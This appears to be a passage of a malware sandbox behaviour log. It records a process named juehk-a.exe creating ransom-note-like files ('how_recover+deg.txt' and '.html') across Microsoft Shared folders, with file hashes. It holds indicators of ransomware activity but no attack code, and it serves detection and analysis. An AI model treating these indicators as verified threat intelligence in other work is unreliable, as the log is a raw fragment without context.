- value: C:\Program Files\Common Files\Microsoft Shared\ink\sk-SK\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521177
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76248
- mode: created
- sequenceNumber: 1190
- value: C:\Program Files\Common Files\Microsoft Shared\ink\sk-SK\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231834
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76253
- mode: close
- sequenceNumber: 1191
- value: C:\Program Files\Common Files\Microsoft Shared\ink\sk-SK\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231834
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76258
- mode: created
- sequenceNumber: 1192
- value: C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521179
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76262
- mode: close
- sequenceNumber: 1193
- value: C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521179
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76277
- mode: created
- sequenceNumber: 1194
- value: C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521180
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76288
- mode: close
- sequenceNumber: 1195
- value: C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521180
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76293
- mode: created
- sequenceNumber: 1196
- value: C:\Program Files\Common Files\Microsoft Shared\ink\sr-Latn-CS\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1688849860346362
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76297
- mode: close
- sequenceNumber: 1197
- value: C:\Program Files\Common Files\Microsoft Shared\ink\sr-Latn-CS\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1688849860346362
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76312
- mode: created
- sequenceNumber: 1198
- value: C:\Program Files\Common Files\Microsoft Shared\ink\sr-Latn-CS\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521181
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76318
- mode: close
- sequenceNumber: 1199
- value: C:\Program Files\Common Files\Microsoft Shared\ink\sr-Latn-CS\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521181
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76437
- mode: created
- sequenceNumber: 1200
- value: C:\Program Files\Common Files\Microsoft Shared\ink\sv-SE\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521182
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76443
- mode: close
- sequenceNumber: 1201
- value: C:\Program Files\Common Files\Microsoft Shared\ink\sv-SE\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521182
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76449
- mode: created
- sequenceNumber: 1202
- value: C:\Program Files\Common Files\Microsoft Shared\ink\sv-SE\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231839
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76463
- mode: close
- sequenceNumber: 1203
- value: C:\Program Files\Common Files\Microsoft Shared\ink\sv-SE\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231839
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76468
- mode: created
- sequenceNumber: 1204
- value: C:\Program Files\Common Files\Microsoft Shared\ink\th-TH\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906942496
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76472
- mode: close
- sequenceNumber: 1205
- value: C:\Program Files\Common Files\Microsoft Shared\ink\th-TH\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906942496
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76477
- mode: created
- sequenceNumber: 1206
- value: C:\Program Files\Common Files\Microsoft Shared\ink\th-TH\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231841
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76481
- mode: close
- sequenceNumber: 1207
- value: C:\Program Files\Common Files\Microsoft Shared\ink\th-TH\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231841
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76486
- mode: created
- sequenceNumber: 1208
- value: C:\Program Files\Common Files\Microsoft Shared\ink\tr-TR\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231842
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76490
- mode: close
- sequenceNumber: 1209
- value: C:\Program Files\Common Files\Microsoft Shared\ink\tr-TR\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231842
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76497
- mode: created
- sequenceNumber: 1210
- value: C:\Program Files\Common Files\Microsoft Shared\ink\tr-TR\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521187
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76503
- mode: close
- sequenceNumber: 1211
- value: C:\Program Files\Common Files\Microsoft Shared\ink\tr-TR\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521187
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76566
- mode: created
- sequenceNumber: 1212
- value: C:\Program Files\Common Files\Microsoft Shared\ink\uk-UA\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521188
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76572
- mode: close
- sequenceNumber: 1213
- value: C:\Program Files\Common Files\Microsoft Shared\ink\uk-UA\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521188
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76578
- mode: created
- sequenceNumber: 1214
- value: C:\Program Files\Common Files\Microsoft Shared\ink\uk-UA\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521189
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76586
- mode: close
- sequenceNumber: 1215
- value: C:\Program Files\Common Files\Microsoft Shared\ink\uk-UA\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521189
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76590
- mode: created
- sequenceNumber: 1216
- value: C:\Program Files\Common Files\Microsoft Shared\ink\zh-CN\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906942502
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76594
- mode: close
- sequenceNumber: 1217
- value: C:\Program Files\Common Files\Microsoft Shared\ink\zh-CN\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906942502
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76708
- mode: created
- sequenceNumber: 1218
- value: C:\Program Files\Common Files\Microsoft Shared\ink\zh-CN\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231847
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76714
- mode: close
- sequenceNumber: 1219
- value: C:\Program Files\Common Files\Microsoft Shared\ink\zh-CN\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231847
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76724
- mode: created
- sequenceNumber: 1220
- value: C:\Program Files\Common Files\Microsoft Shared\ink\zh-TW\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231848
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76731
- mode: close
- sequenceNumber: 1221
- value: C:\Program Files\Common Files\Microsoft Shared\ink\zh-TW\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231848
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76739
- mode: created
- sequenceNumber: 1222
- value: C:\Program Files\Common Files\Microsoft Shared\ink\zh-TW\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521193
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76745
- mode: close
- sequenceNumber: 1223
- value: C:\Program Files\Common Files\Microsoft Shared\ink\zh-TW\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521193
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76754
- mode: created
- sequenceNumber: 1224
- value: C:\Program Files\Common Files\Microsoft Shared\ink\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231850
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76759
- mode: close
- sequenceNumber: 1225
- value: C:\Program Files\Common Files\Microsoft Shared\ink\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231850
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76766
- mode: created
- sequenceNumber: 1226
- value: C:\Program Files\Common Files\Microsoft Shared\ink\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521195
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76772
- mode: close
- sequenceNumber: 1227
- value: C:\Program Files\Common Files\Microsoft Shared\ink\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521195
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76808
- mode: created
- sequenceNumber: 1228
- value: C:\Program Files\Common Files\Microsoft Shared\MSClientDataMgr\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906942508
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76814
- mode: close
- sequenceNumber: 1229
- value: C:\Program Files\Common Files\Microsoft Shared\MSClientDataMgr\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906942508
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76910
- mode: created
- sequenceNumber: 1230
- value: C:\Program Files\Common Files\Microsoft Shared\MSClientDataMgr\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231853
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76916
- mode: close
- sequenceNumber: 1231
- value: C:\Program Files\Common Files\Microsoft Shared\MSClientDataMgr\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231853
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76921
- mode: created
- sequenceNumber: 1232
- value: C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521198
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76930
- mode: close
- sequenceNumber: 1233
- value: C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521198
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76936
- mode: created
- sequenceNumber: 1234
- value: C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231855
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76940
- mode: close
- sequenceNumber: 1235
- value: C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231855
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76947
- mode: created
- sequenceNumber: 1236
- value: C:\Program Files\Common Files\Microsoft Shared\MSInfo\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521200
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76953
- mode: close
- sequenceNumber: 1237
- value: C:\Program Files\Common Files\Microsoft Shared\MSInfo\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521200
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76980
- mode: created
- sequenceNumber: 1238
- value: C:\Program Files\Common Files\Microsoft Shared\MSInfo\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521201
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76986
- mode: close
- sequenceNumber: 1239
- value: C:\Program Files\Common Files\Microsoft Shared\MSInfo\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521201
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77024
- mode: created
- sequenceNumber: 1240
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\1033\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521202
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77030
- mode: close
- sequenceNumber: 1241
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\1033\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521202
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77037
- mode: created
- sequenceNumber: 1242
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\1033\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231859
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77043
- mode: close
- sequenceNumber: 1243
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\1033\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231859
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77075
- mode: created
- sequenceNumber: 1244
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Cultures\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521204
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77080
- mode: close
- sequenceNumber: 1245
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Cultures\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521204
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77086
- mode: created
- sequenceNumber: 1246
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Cultures\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1407374883653173
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77093
- mode: close
- sequenceNumber: 1247
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Cultures\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1407374883653173
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77174
- mode: created
- sequenceNumber: 1248
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\Cartridges\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521206
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77181
- mode: close
- sequenceNumber: 1249
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\Cartridges\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521206
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77187
- mode: created
- sequenceNumber: 1250
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\Cartridges\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521207
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77193
- mode: close
- sequenceNumber: 1251
